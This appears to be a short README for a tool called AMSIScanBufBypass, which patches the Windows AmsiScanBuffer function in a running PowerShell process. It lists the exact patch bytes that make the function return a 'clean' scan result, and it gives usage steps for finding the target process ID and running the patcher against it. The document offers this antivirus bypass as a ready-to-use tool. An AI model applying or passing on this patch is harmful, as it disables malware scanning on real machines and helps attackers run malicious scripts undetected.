AMSIScanBufBypass
Memory Patching AMSIScanBuffer
Patching the AmsiScanBuffer Method with the following opcodes - 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3
mov eax,offset (offset has AMSI_RESULT_CLEAN)
retUsage
Get processid of your target - tasklist | findstr powershell.exe
amsipatch.exe pid
